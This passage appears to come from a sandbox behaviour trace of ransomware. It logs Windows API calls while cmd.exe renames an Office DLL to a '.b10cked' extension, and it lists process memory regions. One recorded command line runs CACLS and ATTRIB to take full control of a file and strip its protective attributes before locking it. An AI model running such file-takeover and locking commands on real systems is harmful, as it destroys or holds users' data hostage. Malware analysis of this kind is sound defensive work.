\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked\"" [0176.956] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.956] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x391970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0176.957] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0176.957] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0176.957] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.957] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0176.957] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0176.957] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0176.957] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0176.957] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0176.957] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0176.957] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0176.957] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0176.957] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0176.957] GetEnvironmentStringsW () returned 0x392360* [0176.957] FreeEnvironmentStringsW (penv=0x392360) returned 1 [0176.957] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.957] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0176.957] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0176.957] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0176.957] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0176.957] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0176.957] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0176.958] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0176.958] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0176.958] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0176.958] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f9b0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.958] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24f9b0, lpFilePart=0x24f9ac | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24f9ac*="Desktop") returned 0x18 [0176.958] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0176.958] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f72c | out: lpFindFileData=0x24f72c) returned 0x3909f0 [0176.958] FindClose (in: hFindFile=0x3909f0 | out: hFindFile=0x3909f0) returned 1 [0176.958] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f72c | out: lpFindFileData=0x24f72c) returned 0x3909f0 [0176.958] FindClose (in: hFindFile=0x3909f0 | out: hFindFile=0x3909f0) returned 1 [0176.958] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f72c | out: lpFindFileData=0x24f72c) returned 0x3909f0 [0176.959] FindClose (in: hFindFile=0x3909f0 | out: hFindFile=0x3909f0) returned 1 [0176.959] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0176.959] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0176.959] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0176.959] GetEnvironmentStringsW () returned 0x390210* [0176.959] FreeEnvironmentStringsW (penv=0x390210) returned 1 [0176.959] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.960] GetConsoleOutputCP () returned 0x1b5 [0176.960] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0176.960] GetUserDefaultLCID () returned 0x409 [0176.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0176.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24faf0, cchData=128 | out: lpLCData="0") returned 2 [0176.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x24faf0, cchData=128 | out: lpLCData="0") returned 2 [0176.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24faf0, cchData=128 | out: lpLCData="1") returned 2 [0176.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0176.960] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0176.961] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0176.961] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0176.962] GetConsoleTitleW (in: lpConsoleTitle=0x380930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.962] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0176.962] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0176.962] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0176.962] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0176.963] _wcsicmp (_String1="move", _String2=")") returned 68 [0176.963] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0176.963] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0176.963] _wcsicmp (_String1="IF", _String2="move") returned -4 [0176.963] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0176.963] _wcsicmp (_String1="REM", _String2="move") returned 5 [0176.963] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0176.967] GetConsoleTitleW (in: lpConsoleTitle=0x24f7e8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0176.968] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0176.968] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0176.968] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0176.968] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0176.968] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0176.968] _wcsicmp (_String1="move", _String2="CD") returned 10 [0176.968] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0176.968] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0176.968] _wcsicmp (_String1="move", _String2="REN") returned -5 [0176.968] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0176.968] _wcsicmp (_String1="move", _String2="SET") returned -6 [0176.968] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0176.968] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0176.968] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0176.968] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0176.968] _wcsicmp (_String1="move", _String2="MD") returned 11 [0176.968] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0176.968] _wcsicmp (_String1="move", _String2="RD") returned -5 [0176.968] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0176.968] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0176.968] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0176.968] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0176.968] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0176.968] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0176.968] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0176.968] _wcsicmp (_String1="move", _String2="VER") returned -9 [0176.968] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0176.968] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0176.968] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0176.968] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0176.968] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0176.969] _wcsicmp (_String1="move", _String2="START") returned -6 [0176.969] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0176.969] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0176.969] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0176.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.970] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0176.970] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x24f5a4, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x24f59c, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x24f59c*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0176.971] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0176.972] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0176.972] _wcsicmp (_String1="XLSLIC~1.TRX", _String2=".") returned 74 [0176.972] _wcsicmp (_String1="XLSLIC~1.TRX", _String2="..") returned 74 [0176.972] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlslic~1.trx")) returned 0x2020 [0176.972] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x391f20 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0176.972] SetErrorMode (uMode=0x0) returned 0x0 [0176.972] SetErrorMode (uMode=0x1) returned 0x0 [0176.972] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX", nBufferLength=0x104, lpBuffer=0x24ef2c, lpFilePart=0x24ef14 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX", lpFilePart=0x24ef14*="XLSLIC~1.TRX") returned 0x3c [0176.972] SetErrorMode (uMode=0x0) returned 0x1 [0176.972] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0176.972] _wcsicmp (_String1="XLSLIC~1.TRX", _String2=".") returned 74 [0176.972] _wcsicmp (_String1="XLSLIC~1.TRX", _String2="..") returned 74 [0176.972] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlslic~1.trx")) returned 0x2020 [0176.972] SetErrorMode (uMode=0x0) returned 0x0 [0176.973] SetErrorMode (uMode=0x1) returned 0x0 [0176.973] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX", nBufferLength=0x104, lpBuffer=0x24f3a8, lpFilePart=0x24f140 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX", lpFilePart=0x24f140*="XLSLIC~1.TRX") returned 0x3c [0176.973] SetErrorMode (uMode=0x0) returned 0x1 [0176.973] SetErrorMode (uMode=0x0) returned 0x0 [0176.973] SetErrorMode (uMode=0x1) returned 0x0 [0176.973] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x24f5b0, lpFilePart=0x24f140 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked", lpFilePart=0x24f140*="XLSLICER.DLL.trx_dll.b10cked") returned 0x4c [0176.973] SetErrorMode (uMode=0x0) returned 0x1 [0176.973] SetLastError (dwErrCode=0x0) [0176.973] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlslicer.dll.trx_dll.b10cked")) returned 0xffffffff [0176.973] GetLastError () returned 0x2 [0176.973] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x24eabc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24eabc) returned 0x392130 [0176.973] FindNextFileW (in: hFindFile=0x392130, lpFindFileData=0x24eabc | out: lpFindFileData=0x24eabc) returned 0 [0176.974] GetLastError () returned 0x12 [0176.974] FindClose (in: hFindFile=0x392130 | out: hFindFile=0x392130) returned 1 [0176.975] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x391cc0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x391cc0) returned 0x392130 [0176.975] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x24ed54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x4c [0176.975] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x24ed54, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll", lpFilePart=0x0) returned 0x44 [0176.975] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlslicer.dll.trx_dll")) returned 0x2020 [0176.975] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlslicer.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\xlslicer.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0177.034] FindClose (in: hFindFile=0x392130 | out: hFindFile=0x392130) returned 1 [0177.034] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x24ed08 | out: _Buffer=" 1") returned 9 [0177.034] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.034] GetFileType (hFile=0x7) returned 0x2 [0177.035] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0177.035] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24ec94 | out: lpMode=0x24ec94) returned 1 [0177.035] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.035] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x24ecc8 | out: lpConsoleScreenBufferInfo=0x24ecc8) returned 1 [0177.035] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0177.035] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x24ed08 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0177.035] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x24ecec, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x24ecec*=0x1a) returned 1 [0177.036] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.036] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0177.036] _get_osfhandle (_FileHandle=1) returned 0x7 [0177.036] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0177.036] _get_osfhandle (_FileHandle=0) returned 0x3 [0177.036] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0177.036] SetConsoleInputExeNameW () returned 0x1 [0177.036] GetConsoleOutputCP () returned 0x1b5 [0177.036] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0177.036] SetThreadUILanguage (LangId=0x0) returned 0x409 [0177.036] exit (_Code=0) Process: id = "317" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0xa5c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 24410 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 24411 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 24412 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 24413 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 24414 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 24415 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 24416 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 24417 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 24418 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 24419 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 24457 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 24458 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 24459 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 24460 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 24461 start_va = 0x3e0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000003e0000" filename = "" Region: id = 24462 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 24463 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 24464 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 24465 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 24466 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 24467 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 24468 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 24469 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 24470 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 24471 start_va = 0x2f0000 end_va = 0x3b7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002f0000" filename = "" Region: id = 24472 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: 